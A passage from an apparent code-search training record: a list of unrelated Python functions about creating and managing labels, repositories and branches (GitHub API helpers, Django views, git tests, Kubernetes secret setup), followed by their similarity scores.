entry\n out = client.writeLabel(gracedb_id, label)", "def add_new_label(UniqueLabelList, Label):\n\n NewLabel = {}\n NewLabel['LabelName'] = Label['Label']['Name']\n NewLabel['Confidence'] = Label['Label']['Confidence']\n NewLabel['TimeStamps'] = [Label['Timestamp']]\n NewLabel['Count'] = 1\n\t\n UniqueLabelList.append(NewLabel)\n\t\n return NewLabel", "def add_label(self, label):\n if not self.has_label(label):\n self.add_category(scheme=LABELS_SCHEME,\n term='%s#%s' % (LABELS_NS, label),\n label=label)", "def repository_create_hosted():\n pass", "def test_heads_create_new_branch_commit(repository: Repository) -> None:\n branch = repository.heads.create(\"branch\", repository.head.commit)\n assert repository.head.commit == branch.commit", "def repo_new(request):\n if request.method != 'POST':\n form = RepoForm()\n return respond(request, 'repo_new.html', {'form': form})\n form = RepoForm(request.POST)\n errors = form.errors\n if not errors:\n try:\n repo = models.Repository(\n name=form.cleaned_data.get('name'),\n url=form.cleaned_data.get('url'),\n guid=form.cleaned_data.get('guid'),\n )\n except (db.BadValueError, ValueError) as err:\n errors['__all__'] = unicode(err)\n if errors:\n return respond(request, 'repo_new.html', {'form': form})\n repo.put()\n branch_url = repo.url\n if not branch_url.endswith('/'):\n branch_url += '/'\n branch_url += 'trunk/'\n branch = models.Branch(repo_key=repo.key, repo_name=repo.name,\n category='*trunk*', name='Trunk',\n url=branch_url)\n branch.put()\n return HttpResponseRedirect(reverse(repos))", "def create_new_lab(title):\n\n lab = Lab(title=title)\n db.session.add(lab)\n db.session.commit()\n\n return 
lab", "def user_labels_new(*args):\n return _ida_hexrays.user_labels_new(*args)", "def create_new_node(subgraph, prev_node, label, bb):\n return add_node(subgraph, update_node_name(prev_node.get_name(), bb-1), label=update_bb_string(label, bb-1))", "def rdf_update_labels(rdf, node):\n final_list = []\n for i in node.get_labels():\n # print(i)\n final_list += rdf_get_branch(rdf, i)\n for i in final_list:\n node.add_label(i)", "def branch_new(request, repo_id):\n repo = models.Repository.get_by_id(int(repo_id))\n if request.method != 'POST':\n form = BranchForm(initial={'url': repo.url,\n 'category': 'branch',\n })\n return respond(request, 'branch_new.html', {'form': form, 'repo': repo})\n form = BranchForm(request.POST)\n errors = form.errors\n if not errors:\n try:\n branch = models.Branch(\n repo_key=repo.key,\n category=form.cleaned_data.get('category'),\n name=form.cleaned_data.get('name'),\n url=form.cleaned_data.get('url'),\n )\n except (db.BadValueError, ValueError) as err:\n errors['__all__'] = unicode(err)\n if errors:\n return respond(request, 'branch_new.html', {'form': form, 'repo': repo})\n branch.repo_name = repo.name\n branch.put()\n return HttpResponseRedirect(reverse(repos))", "def createLabel(self, address: ghidra.program.model.address.Address, name: unicode, makePrimary: bool) -> ghidra.program.model.symbol.Symbol:\n ...", "def get_label(repo, title, verbose=None):\n if verbose:\n print \"Checking for label...\"\n label = None\n label_text = None\n try:\n label_start = 1 + title.index('(')\n label_end = title.index(')')\n label_text = title[label_start:label_end]\n except ValueError, e:\n print \"Warning: This tile has no embeded label. {0}\".format(e)\n if label_text:\n try:\n label = [repo.get_label(label_text)]\n if verbose:\n print \"Found label: {0}\".format(label)\n except UnknownObjectException, e:\n print \"Error: The label '{0}' does not exist on \" \\\n \"Github. {1}\".format(label_text, e)\n return label", "def delete_label(self, repository, name, **kwargs):\n response = self.session.delete(\n '{}/repos/{}/labels/{}'.format(\n self.GH_API_ENDPOINT, repository, name\n )\n )\n if response.status_code != 204:\n raise GitHubError(response)", "def create(self, label_id):\n data = {\n 'type': 'tagit',\n 'rate_count': 0,\n 'rate_range': 'day',\n 'limit_count': 0,\n 'limit_range': 'day',\n 'schedule': [],\n 'enabled': True,\n 'args': {\n 'sn': label_id,\n 'tag_sn': label_id\n }\n }\n # Yes, it's confusing. 
the `/actions/` endpoint is used for tags, while\n # the /tags/ endpoint is used for labels.\n return self._post(\n request=ApiActions.CREATE.value,\n uri=ApiUri.ACTIONS.value,\n params=data\n )", "def cmd_create(self):\n self.repo.create()\n\n # Add .gitignore.\n self.repo.add_files({'.gitignore': '.swp\\n'}, FIRST_COMMIT_MSG)\n\n # Create the etc and timestamps branches.\n self.repo.checkout('etc', create=True)\n self.repo.checkout('timestamps', create=True)\n\n self.repo.checkout('master')\n self.repo.init()\n self.update_repository()\n print('Git repository created at %s' % self.repodir)", "def register_repo_create(self, body):\n httpretty.register_uri(\n httpretty.POST,\n '{url}orgs/{org}/repos'.format(\n url=self.URL,\n org=self.ORG,\n ),\n body=body\n )", "def n(label):\n global id\n node = pydot.Node(name=id, obj_dict=None, label=label)\n id += 1\n graph.add_node(node)\n return node", "def post_issue_labels(repo, project, issue_number):\n issue_path = '%s/%s/issues/%d' % (repo, project, issue_number)\n\n new_label_ids = request.json\n\n current_label_ids = dao.get_issue_label_ids(issue_path)\n\n revised_label_ids = current_label_ids + new_label_ids\n\n dao.set_issue_label_ids(issue_path, revised_label_ids)\n\n return if_found(dao.get_issue_labels(issue_path))", "def projects_label(args):\n session = GithubSession()\n\n label_datas = list(session.get_labels())\n\n team = args.team\n team_label_data = None\n if team:\n team_label = utils.get_label(team, prefix=\"team\")\n team_label_data = [x for x in label_datas if x[\"name\"] == team_label][0]\n\n # get the project label\n project_label = utils.get_label(args.name, prefix=\"project\")\n project_label_data = [x for x in label_datas if x[\"name\"] == project_label][0]\n\n print(f\"label cards in project {args.name} column {args.column}\")\n\n project_board = session.get_project(args.name)\n project_backlog_grooming = session.get_column(project_board, \"backlog grooming\")\n\n cards = list(session.get_cards(project_backlog_grooming))\n for card_data in cards:\n issue_number = utils.get_issue_number_from_card_data(card_data)\n\n print(issue_number)\n\n # add the project label\n session.add_label(project_label_data, number=issue_number)\n\n if team_label_data:\n session.add_label(team_label_data, number=issue_number)", "def test_issue_replace_labels(self):\n pass", "def test_heads_create_new_branch_at_another_branch(repository: Repository) -> None:\n main = repository.head\n branch1 = repository.heads.create(\"branch1\")\n\n repository.checkout(branch1)\n repository.commit()\n\n repository.checkout(main)\n branch2 = repository.heads.create(\"branch2\", branch1.commit)\n\n assert branch1.commit == branch2.commit", "def test_build_image(self):\n labels = {\"apple\": \"red\", \"grape\": \"green\"}\n self.docker.images.build(\n path=\"test/python/docker/build_labels\",\n labels=labels,\n tag=\"labels\",\n isolation=\"default\",\n )\n image = self.docker.images.get(\"labels\")\n self.assertEqual(image.labels[\"apple\"], labels[\"apple\"])\n self.assertEqual(image.labels[\"grape\"], labels[\"grape\"])", "def place_label(\r\n product,\r\n label_df,\r\n product_file,\r\n base_dir\r\n):\r\n # enforce match between putative filename root and label filename\r\n try:\r\n label_file = eqloc(\r\n label_df, \"filename\", product.root\r\n )[\"local_path\"].values[0]\r\n except KeyError:\r\n raise KeyError(\"Label for \" + product.root + \" not found in index.\")\r\n\r\n # check stated filename and product id\r\n with open(label_file) as file:\r\n label 
= file.read()\r\n enforce_name_match(label, product.root)\r\n\r\n # and then copy label to correct place\r\n shutil.copy(label_file, base_dir + product.newpath)\r\n # and finally copy source file to filepath listed in label\r\n if product_file:\r\n fn_tag = re.search(FN_PATTERN, label).group(0)\r\n shutil.copy(product_file, base_dir + product.newpath + \"/\" + fn_tag)\r\n return {\r\n 'product_id': re_search(label_file, LID_PATTERN),\r\n 'label': base_dir + product.newpath + \"/\" + product.root + \".xml\"\r\n }", "def _add_node(self, node_name, node_type):\n q = 'MATCH (r:' + node_type + ') WHERE r.name=\"' \\\n + node_name + '\" RETURN r'\n results = self.db.query(q, returns=(client.Node, str, client.Node))\n res = self.db.labels.create(node_type)\n\n if (len(results) == 0):\n r = self.db.nodes.create(name=node_name)\n res.add(r)\n else:\n r = results[0][0]\n return r", "def testEditConfigCreatePortLabel(self):\n self.ports.editconfig_create_port_label(file_name = 'editconfig_create_port_label.xml', port_ids = portsDict['port_ids'], port_labels = portsDict['port_label'])", "def add_labels(self, labels: dict):\n self.status = \"Creating labels\"\n for lname, value in labels.items():\n self.labels.add_label(lname, value)", "def test_issue_get_label(self):\n pass", "def update_labels(source_repo, service, source_service, destination):\n app = App()\n if source_repo:\n serv = app.get_service(source_service, repo=source_repo)\n else:\n serv = app.guess_service()\n repo_labels = serv.list_labels()\n if not repo_labels:\n print(\"No labels.\")\n return\n\n for repo_for_copy in destination:\n other_serv = app.get_service(service, repo=repo_for_copy)\n changes = other_serv.update_labels(labels=repo_labels)\n\n click.echo(\"{changes} labels of {labels_count} copied to {repo_name}\".format(\n changes=changes,\n labels_count=len(repo_labels),\n repo_name=repo_for_copy\n ))", "def test_issue_edit_label(self):\n pass", "def user_labels_insert(*args):\n return _ida_hexrays.user_labels_insert(*args)", "def _add_label(self):\n\n label = self._label_edit.text()\n labelNames = [i[0] for i in self.labels]\n if not label in list(labelNames):\n self.labels.append((label,0))\n self._option_selector.addItem(label)\n with open(\"{}/labels.txt\".format(self.output_directory), 'a') as file:\n file.write(\"{}\\n\".format(label))\n self._label_edit.setText('')", "def create_label2id(cfg):\n label2id_model_path = join(\n cfg.model_dir, 'labels.json')\n\n # label2id is stored in the data dir and model dir\n if not exists(label2id_model_path):\n label2id_data_path = join(\n cfg.data_dir, 'labels.json')\n\n if not exists(label2id_data_path):\n label2id = {}\n\n for label in generate_labels(\n cfg, ['train.jsonl', 'valid.jsonl']):\n if label not in label2id:\n label2id[label] = len(label2id)\n\n with open(label2id_data_path, 'w') as fh:\n json.dump(label2id, fh)\n\n else:\n with open(label2id_data_path, 'r') as fh:\n label2id = json.load(fh)\n\n with open(label2id_model_path, 'w') as fh:\n json.dump(label2id, fh)\n\n with open(label2id_model_path, 'r') as fh:\n label2id = json.load(fh)\n\n return label2id", "def add_labels_to_issue(self, installation_id, repo_owner, repo_name,\n issue_num, predictions):\n # take an action if the prediction is confident enough\n if predictions['labels']:\n label_names, label_probabilities = self.filter_specified_labels(repo_owner,\n repo_name,\n predictions)\n else:\n label_names = []\n\n # get the isssue handle\n issue = get_issue_handle(installation_id, repo_owner, repo_name, 
issue_num)\n\n if label_names:\n # create message\n message = \"\"\"Issue-Label Bot is automatically applying the labels `{labels}` to this issue, with the confidence of {confidence}.\n Please mark this comment with :thumbsup: or :thumbsdown: to give our bot feedback!\n Links: [app homepage](https://github.com/marketplace/issue-label-bot), [dashboard]({app_url}data/{repo_owner}/{repo_name}) and [code](https://github.com/hamelsmu/MLapp) for this bot.\n \"\"\".format(labels=\"`, `\".join(label_names),\n confidence=\", \".join([\"{:.2f}\".format(p) for p in label_probabilities]),\n app_url=self.app_url,\n repo_owner=repo_owner,\n repo_name=repo_name)\n # label the issue using the GitHub api\n issue.add_labels(*label_names)\n logging.info(f'Add `{\"`, `\".join(label_names)}` to the issue # {issue_num}')\n else:\n message = \"\"\"Issue Label Bot is not confident enough to auto-label this issue.\n See [dashboard]({app_url}data/{repo_owner}/{repo_name}) for more details.\n \"\"\".format(app_url=self.app_url,\n repo_owner=repo_owner,\n repo_name=repo_name)\n logging.warning(f'Not confident enough to label this issue: # {issue_num}')\n\n # make a comment using the GitHub api\n comment = issue.create_comment(message)", "def test_heads_setitem_new(repository: Repository) -> None:\n repository.heads[\"branch\"] = repository.head.commit\n assert repository.head.commit == repository.heads[\"branch\"]", "def test_issue_delete_label(self):\n pass", "def post(self):\n if not request.json:\n return None, 400\n\n created_git_repository: GitRepositoryModel = self.datastore.create(document=request.json)\n return created_git_repository, 201", "def setLabel(*args):", "def setLabel(*args):", "def setLabel(*args):", "def setLabel(*args):", "def setLabel(*args):", "def write_label(self, label: str) -> None:\n self._write(f'({self._file_name}${label})')", "def labels_by_name(self, username, repository_name, access_token=None):\n return self._complete_request_by_name(\n username, repository_name, \"labels\", access_token)", "def test_heads_create_existing_branch(repository: Repository) -> None:\n heads = repository.heads\n branch = heads.create(\"branch\", repository.head.commit)\n with pytest.raises(pygit2.AlreadyExistsError):\n heads.create(branch.name, branch.commit)", "def __init__(self, label):\n self.label = label", "def create(client, args):\n\n\tdef validate_description(text):\n\t\tif len(text) == 0:\n\t\t\tprint 'Description may not be empty. Try again.'\n\t\t\treturn False\n\t\treturn True\n\n\tdef validate_name(text):\n\t\tif len(text) == 0:\n\t\t\tprint 'Name may not be empty. Try again.'\n\t\t\treturn False\n\t\tif any(char for char in text if char.isspace()):\n\t\t\tprint 'Name may not contain spaces. Try again.'\n\t\t\treturn False\n\t\t# What other characters don't belong in the name?\n\t\treturn True\n\n\tdef validate_homepage(text):\n\t\t# This is a lame excuse for validation.\n\t\tif len(text) == 0:\n\t\t\tprint 'Home page may not be empty. 
Try again.'\n\t\t\treturn False\n\t\treturn True\n\n\tname = read_user_input('Repository name', validate_name)\n\thomepage = read_user_input('Homepage', validate_homepage)\n\tdescription = read_user_input('Description', validate_description)\n\tprint client.repos.create(name, description, homepage)", "def create_label(self, on, text: str):\n return tk.Label(on, font=self.FONT, bg=self.BG_COLOR, text=text)", "def test_create_repository(koan, assert_repo_exists):\n koan.shell('')", "def addAutolabel(call, args=(), kwargs={}, nodeClass='*'):", "def new_repo(req, source, psp_dir, url_helper=None):\n req.content_type = 'text/html'\n repo_dir = req.filename.rsplit('/', 1)[0]\n files = [f for f in os.listdir(repo_dir) if f[-3:] == '.h5']\n top_level = psp.PSP(req, filename=psp_dir+'new_repo.psp')\n top_level.run({'context': req.uri,\n 'files': files})", "def add(name, url):\n click.echo(\"registered repo {} at url {}\".format(name, url))", "def test__create_label_w_no_ent_id(ruler: SpaczzRuler) -> None:\n assert ruler._create_label(\"TEST\", None) == \"TEST\"", "def test_issue_remove_label(self):\n pass", "def __add_new_label(self, name, value):\n self.__labels_dict[name] = value", "def create_code_repository(CodeRepositoryName=None, GitConfig=None):\n pass", "def add(self, label):\n return_type = Term(self.context)\n self.add_child(return_type)\n\n def _set_loaded():\n term_create_info = {\n \"labels\": ClientValueCollection(LocalizedLabel, [LocalizedLabel(label)])\n }\n qry = CreateEntityQuery(self, term_create_info, return_type)\n self.context.add_query(qry)\n\n self._parent_set.ensure_property(\"id\", _set_loaded)\n return return_type", "def on_save_label(self, image_id, label_id):\n logger.info(f\"New label saved for: {image_id} => {label_id}\")", "def setup_label(self, node):\n self._options['id'] = node.argument", "def add(self, key, label):\n self.labels[key] = label", "def addTag(self, repoType, txt, addSlash=True, project=0):\n # remove slash\n while txt.startswith(\"/\"):\n txt = txt[1:]\n \n # add fix to support & in filename, ampersand is used \n # as a shortcut for the tab by pyqt\n txt = txt.replace(\"&\", \"&&\")\n # end of fix\n \n if repoType == UCI.REPO_TESTS_LOCAL:\n repo = \"local-tests\"\n elif repoType == UCI.REPO_TESTS:\n repo = \"remote-tests\"\n project_name = self.iRepo.remote().getProjectName(project=project)\n repo += '(%s)' % project_name\n elif repoType == UCI.REPO_ADAPTERS:\n repo = \"remote-adapters\"\n elif repoType == UCI.REPO_LIBRARIES:\n repo = \"remote-libraries\"\n elif repoType == UCI.REPO_UNDEFINED:\n repo = \"undefined\"\n else:\n repo = \"unknown\"\n self.error( \"repo unknown: %s\" % repoType )\n if addSlash:\n if repoType == UCI.REPO_TESTS_LOCAL:\n ret = \"%s:%s\" % (repo, txt) \n else:\n ret = \"%s:/%s\" % (repo, txt)\n else:\n ret = \"%s: %s\" % (repo, txt) \n return ret", "def change_issues_label(self, msg, old_label, new_label):\n self._asset_bind(msg)\n yield (\"Processing....\")\n trans = self._translation_util(msg)\n client = self._github_operator(msg)\n cmd = \"repo:{} label:{} is:open type:issue\".format(\n task_repository_name(), old_label)\n issue_list = client.search_issue(cmd, 10)\n for issue in issue_list:\n trans.wait_for_limit(MAX_RESULT, MAX_RESULT)\n issue.remove_from_labels(old_label)\n issue.add_to_labels(new_label)\n yield \"{} issues has been changed label from {} to {}\".format(len(issue_list), old_label, new_label)", "def add_label(self, label_key, label_value):\n # type: (str, str) -> bool\n headers = Headers({\"content-type\": 
\"application/json\", \"accept\": \"application/json\"})\n response_result = self.connection.api_call(\n \"PUT\",\n [\n \"v1\",\n \"datasets\",\n self.dataset_id,\n \"resources\",\n self.id,\n \"labels\",\n label_key,\n label_value,\n ],\n headers=headers,\n )\n\n if response_result:\n # Sync the latest data from API to prevent inconsistency\n self.refresh()\n\n return True", "def _add_label_switching_node( self,\n node_tree,\n label_vec,\n last_element,\n label_ID_node=None,\n node_index=0,\n uv_map=None, \n node_offset=[0,0]):\n\n # define local variables #######################################################################################\n _step_node_width = 200 # x seperation of nodes\n _step_node_height = 200 # y seperation of nodes\n ################################################################################ end of define local variables #\n\n # create image ID handle #######################################################################################\n if label_ID_node is None:\n label_ID_node = node_tree.node_tree.nodes.new(\"ShaderNodeValue\")\n label_ID_node.location = ((node_offset[0]-400,node_offset[1]-100))\n label_ID_node.name = \"label_step_ID\"\n label_ID_node.label = \"label_step_ID\"\n label_ID_node.outputs[0].default_value = 1\n ############################################################################### end of create image ID handle #\n\n # create image nodes ###########################################################################################\n _x_offset = (node_index+1)*_step_node_width + node_offset[0]\n _y_offset = (node_index+1)*_step_node_height + node_offset[1]\n\n _semantic_node_offset = [(node_index+1)*_step_node_width*2 + node_offset[0]-1000,(node_index+1)*\\\n _step_node_height + node_offset[1]+200]\n\n _semantic_tree, self._semantic_pass_id = self.create_semantic_nodes(node_tree=self._world_node_tree,\n label_ID_vec=label_vec,\n num_label_per_channel=15, # TODO add in script\n env_mode=True,\n uv_map=uv_map,\n node_offset=_semantic_node_offset)\n\n _semantic_tree.inputs[0].default_value = 1\n\n # create new mix node ######################################################################################\n _current_mix_shader_node = node_tree.node_tree.nodes.new(\"ShaderNodeMixRGB\")\n _current_mix_shader_node.location = (((node_index+1)*_step_node_width*2 + node_offset[0],\n (node_index+1)*_step_node_height + node_offset[1]))\n ############################################################################### end of create new mix node #\n\n # create compare node ######################################################################################\n _current_compare_node = node_tree.node_tree.nodes.new(\"ShaderNodeMath\")\n _current_compare_node.location = (((node_index+1)*_step_node_width*2 + node_offset[0],\n node_offset[1]-_step_node_height))\n _current_compare_node.operation = 'COMPARE'\n _current_compare_node.inputs[0].default_value = node_index\n _current_compare_node.inputs[2].default_value = 0 # delta value should be zero for equal comparison\n ############################################################################### end of create compare node #\n\n\n # link nodes togther #######################################################################################\n node_tree.node_tree.links.new(_current_mix_shader_node.inputs[0], _current_compare_node.outputs[0])\n if last_element is not None:\n node_tree.node_tree.links.new(_current_mix_shader_node.inputs[1], last_element.outputs[0])\n 
node_tree.node_tree.links.new(_current_mix_shader_node.inputs[2], _semantic_tree.outputs[0])\n \n node_tree.node_tree.links.new(_current_compare_node.inputs[1], label_ID_node.outputs[0])\n ################################################################################ end of link nodes togther #\n #################################################################################### end of create image nodes #\n\n # return last mix shader node\n return _current_mix_shader_node, label_ID_node", "def create_dev():\n bucket_name = \"issue-label-bot-dev_secrets\"\n blob_name = \"kf-label-bot-dev.2019-12-30.private-key.pem\"\n\n storage_client = storage.Client()\n\n bucket = storage_client.bucket(bucket_name)\n blob = bucket.blob(blob_name)\n contents = blob.download_as_string().decode()\n\n subprocess.check_call([\"kubectl\", \"-n\", \"label-bot-dev\", \"create\",\n \"secret\", \"generic\",\n \"github-app\",\n f\"--from-literal=kf-label-bot-dev.private-key.pem=\"\n f\"{contents}\"])", "def create_prod():\n bucket_name = \"github-probots_secrets\"\n blob_name = \"issue-label-bot-github-app.private-key.pem\"\n namespace = \"label-bot-prod\"\n storage_client = storage.Client()\n\n bucket = storage_client.bucket(bucket_name)\n blob = bucket.blob(blob_name)\n contents = blob.download_as_string().decode()\n\n subprocess.check_call([\"kubectl\", \"-n\", namespace, \"create\",\n \"secret\", \"generic\",\n \"github-app\",\n f\"--from-literal={blob_name}=\"\n f\"{contents}\"])", "def create_labels(self):\n for name in self.names:\n temp_button = Label(text=name)\n self.root.ids.label_box.add_widget(temp_button)", "def add_label(self, label, name, label_type):\n assert label_type in ['label', 'prediction', 'guide'], \\\n \"{} not in ['label', 'prediction', 'guide']: Must select an acceptable type\".format(label_type)\n check_numpy_table(label, req_fields=('raw_start', 'raw_length', 'reference_index',\n 'kmer', 'posterior_probability'))\n\n # label.sort(order=['raw_start'], kind='mergesort')\n # check the labels are in the correct format\n assert min(label[\"raw_start\"]) >= 0, \"Raw start cannot be less than 0\"\n assert 0 <= max(label[\"posterior_probability\"]) <= 1, \\\n \"posterior_probability must be between zero and one {}\".format(row[\"posterior_probability\"])\n\n # make sure last label can actually index the signal correctly\n try:\n self.scaled_signal[label[-1][\"raw_start\"]:label[-1][\"raw_start\"] + label[-1][\"raw_length\"]]\n except IndexError:\n raise IndexError(\"labels are longer than signal\")\n\n label1 = np.sort(label, order=['raw_start'], kind='mergesort')\n\n # infer strand alignment of read\n if label1[0][\"reference_index\"] >= label1[-1][\"reference_index\"]:\n minus_strand = True\n else:\n minus_strand = False\n if self.minus_strand is not None:\n if label[0][\"raw_start\"] != label[-1][\"raw_start\"]:\n assert self.minus_strand == minus_strand, \"New label has different strand direction, check label\"\n else:\n self.minus_strand = minus_strand\n\n # set label with the specified name\n if label_type == 'label':\n self.label[name] = label\n elif label_type == 'prediction':\n self.prediction[name] = label\n elif label_type == 'guide':\n self.guide[name] = label" ]
[ "0.7274326", "0.7140176", "0.67611367", "0.6694404", "0.6539713", "0.6458034", "0.64482284", "0.6406368", "0.63728607", "0.6343112", "0.6218493", "0.6180373", "0.6086001", "0.6058881", "0.60423875", "0.6024324", "0.6002186", "0.5988165", "0.5969681", "0.59262604", "0.5906312", "0.5893694", "0.5886118", "0.5861668", "0.5831134", "0.5828109", "0.580204", "0.57648677", "0.57189536", "0.5704992", "0.56976706", "0.56860906", "0.56598115", "0.56492805", "0.56408876", "0.563351", "0.56220114", "0.5621547", "0.5615955", "0.5613129", "0.5607477", "0.5603894", "0.56021714", "0.56011724", "0.5596951", "0.5583017", "0.5558753", "0.5558366", "0.5557851", "0.5522138", "0.5521191", "0.55082715", "0.55035114", "0.5495573", "0.5495313", "0.54899746", "0.5478845", "0.5465398", "0.54598475", "0.5450151", "0.54483503", "0.5447826", "0.54470825", "0.54429656", "0.54411167", "0.5439321", "0.5411056", "0.5410814", "0.540336", "0.53913426", "0.53913426", "0.53913426", "0.53913426", "0.53913426", "0.5374932", "0.5372577", "0.53615445", "0.5360129", "0.5353352", "0.5345057", "0.53447485", "0.53386503", "0.5330407", "0.5329372", "0.532708", "0.53264445", "0.53252447", "0.53235763", "0.5322305", "0.5317826", "0.53135294", "0.5309483", "0.52996707", "0.5281938", "0.5267931", "0.5264457", "0.526259", "0.52574563", "0.52538604", "0.52290124" ]
0.77359784
0
Update existing label in given repository
def update_label(self, repository, name, color, old_name=None, **kwargs): data = {'name': name, 'color': color} response = self.session.patch( '{}/repos/{}/labels/{}'.format( self.GH_API_ENDPOINT, repository, old_name or name ), json=data ) if response.status_code != 200: raise GitHubError(response)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def set_labels(repo: Repository, labels: list[Label]):\n\n log.info(f\"Fetching existing labels from {repo.full_name}\")\n existing_labels = {label.name.casefold(): label for label in repo.get_labels()}\n log.info(f\"Found {len(existing_labels)} existing labels\")\n\n for label in labels:\n qualified_name = label.qualified_name\n folded_name = qualified_name.casefold()\n if folded_name not in existing_labels:\n log.info(f\"Creating label {qualified_name}\")\n repo.create_label(**label.api_arguments)\n elif label != existing_labels[folded_name]:\n log.info(f\"Updating label {qualified_name}\")\n existing_label = existing_labels[folded_name]\n existing_label.edit(**label.api_arguments)\n else:\n log.info(f\"Label {qualified_name} already exists\")", "def UpdateLabel(self) -> _n_6_t_0:", "def updatelabel(task, label, eid):\n ServerManager.get()\n result = ServerManager.api.update_property(task, eid, prop='label', value=label)\n if result.response_type == 'success':\n click.echo(click.style(result.message, fg='green'))\n else:\n click.echo(click.style(result.message, fg='red'))", "def update_labels(source_repo, service, source_service, destination):\n app = App()\n if source_repo:\n serv = app.get_service(source_service, repo=source_repo)\n else:\n serv = app.guess_service()\n repo_labels = serv.list_labels()\n if not repo_labels:\n print(\"No labels.\")\n return\n\n for repo_for_copy in destination:\n other_serv = app.get_service(service, repo=repo_for_copy)\n changes = other_serv.update_labels(labels=repo_labels)\n\n click.echo(\"{changes} labels of {labels_count} copied to {repo_name}\".format(\n changes=changes,\n labels_count=len(repo_labels),\n repo_name=repo_for_copy\n ))", "def _apply_label(self, label):\n data = {\n \"name\" : label.title,\n \"description\" : label.desc,\n \"color\" : label.color\n }\n resp = self._post(\n self._base + \"/labels\", data=self._format_data(data))", "def rdf_update_labels(rdf, node):\n final_list = []\n for i in node.get_labels():\n # print(i)\n final_list += rdf_get_branch(rdf, i)\n for i in final_list:\n node.add_label(i)", "def change_issues_label(self, msg, old_label, new_label):\n self._asset_bind(msg)\n yield (\"Processing....\")\n trans = self._translation_util(msg)\n client = self._github_operator(msg)\n cmd = \"repo:{} label:{} is:open type:issue\".format(\n task_repository_name(), old_label)\n issue_list = client.search_issue(cmd, 10)\n for issue in issue_list:\n trans.wait_for_limit(MAX_RESULT, MAX_RESULT)\n issue.remove_from_labels(old_label)\n issue.add_to_labels(new_label)\n yield \"{} issues has been changed label from {} to {}\".format(len(issue_list), old_label, new_label)", "def put_labels():\n dao.delete_all_labels()\n for label in request.json:\n if 'id' not in label or not label['id']:\n label['id'] = str(uuid.uuid4())\n dao.set_label(id=label['id'],\n name=label['name'],\n fields=label['fields'])\n return if_found(dao.get_labels())", "def label(self, name):\r\n return labels.RepoLabel(self, name)", "def update_label(self, uuid, name):\n payload = self._build_params(uuid=uuid, name=name)\n return Label.deserialize(self._post('labels', None, payload))", "def update_from_repo():\n\treturn", "def update(self, src, labels): # real signature unknown; restored from __doc__\n pass", "def put(self, id):\n context = request.environ.get('context')\n resp = dbapi.netdevices_labels_update(context, id, request.json)\n response = {\"labels\": list(resp.labels)}\n return response, 200, None", "def _update_label(self, outer_pos, inner_pos, 
new_label):\n r, c = outer_pos\n ir, ic = inner_pos\n self.inner_boards[r][c][ir][ic][\"text\"] = new_label", "def delete_label(self, repository, name, **kwargs):\n response = self.session.delete(\n '{}/repos/{}/labels/{}'.format(\n self.GH_API_ENDPOINT, repository, name\n )\n )\n if response.status_code != 204:\n raise GitHubError(response)", "def put_label(id):\n label_id = dao.set_label(id=id,\n name=request.json['name'],\n fields=request.json['fields'])\n\n return jsonify(dao.get_label(label_id))", "def push_to_github(label):\n\n # Make sure we're in the right place to do all the git things.\n os.chdir(taas.data_root())\n\n # If there's nothing to do, then do nothing.\n if (not something_to_commit()):\n print(\"Nothing to commit.\")\n return\n\n branch_name = datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\")\n\n branch_name += \"-\" + label\n\n run([\"git\", \"checkout\", \"-b\", branch_name])\n\n run([\"git\", \"add\", \"-A\"])\n\n run([\"git\", \"status\"])\n\n run([\"git\", \"commit\", \"-m\", \"Automated update: \"+label])\n\n run([\"git\", \"push\", \"--set-upstream\", \"origin\", branch_name])", "def update_label(label1, label2, idx):\n for i in range(0, len(idx)):\n label1[i] = label2[idx[i]]\n return label1", "def label_experiment(self, exp_id):\n exp = experiment.experiment(new_experiment=False, ts=str(exp_id))\n label = request.form.get('label')\n exp.update_metadata(change_label=True, label=label)\n\n return \"OK\"", "async def new_label(event, gh, *args, **kwargs):\n if event.data[\"label\"][\"name\"] == TRIVIAL_LABEL:\n issue_number_found = ISSUE_RE.search(\n event.data[\"pull_request\"][\"title\"])\n if issue_number_found:\n status = create_success_status(issue_number_found)\n else:\n status = TRIVIAL_STATUS\n await _post_status(event, gh, status)", "def create_label(self, repository, name, color, **kwargs):\n data = {'name': name, 'color': color}\n response = self.session.post(\n '{}/repos/{}/labels'.format(self.GH_API_ENDPOINT, repository),\n json=data\n )\n if response.status_code != 201:\n raise GitHubError(response)", "def add_label(self, label):\n status = self.ocp.add_label(resource_name=self.name, label=label)\n self.reload()\n return status", "def update_label(UniqueLabel, Label):\n\n UniqueLabel['Confidence'] = ((UniqueLabel['Confidence'] * UniqueLabel['Count']) + Label['Label']['Confidence'])/(UniqueLabel['Count'] + 1)\n UniqueLabel['TimeStamps'].append(Label['Timestamp'])\n UniqueLabel['Count'] += 1\n\t\n return", "def test_issue_replace_labels(self):\n pass", "def update_code_repository(CodeRepositoryName=None, GitConfig=None):\n pass", "def _UpdateLabels(self, args, migration_job, update_fields):\n add_labels = labels_util.GetUpdateLabelsDictFromArgs(args)\n remove_labels = labels_util.GetRemoveLabelsListFromArgs(args)\n value_type = self.messages.MigrationJob.LabelsValue\n update_result = labels_util.Diff(\n additions=add_labels,\n subtractions=remove_labels,\n clear=args.clear_labels\n ).Apply(value_type)\n if update_result.needs_update:\n migration_job.labels = update_result.labels\n update_fields.append('labels')", "def update_labels(self,label_dict):\n \t\tfor key in self.deps:\n \t\t\tfor dependent in self.deps[key]:\n \t\t\t\tlabel = dependent[1]\n \t\t\t\tlabel_dict[label] = label_dict.get(label,0) + 1\n \t\treturn label_dict", "def changeLabel(nuclideBase, newLabel):\n nuclideBase.label = newLabel\n byLabel[newLabel] = nuclideBase", "def test_labels_change(self):\n label_new = factories.LabelFactory(name=\"test_label\",\n 
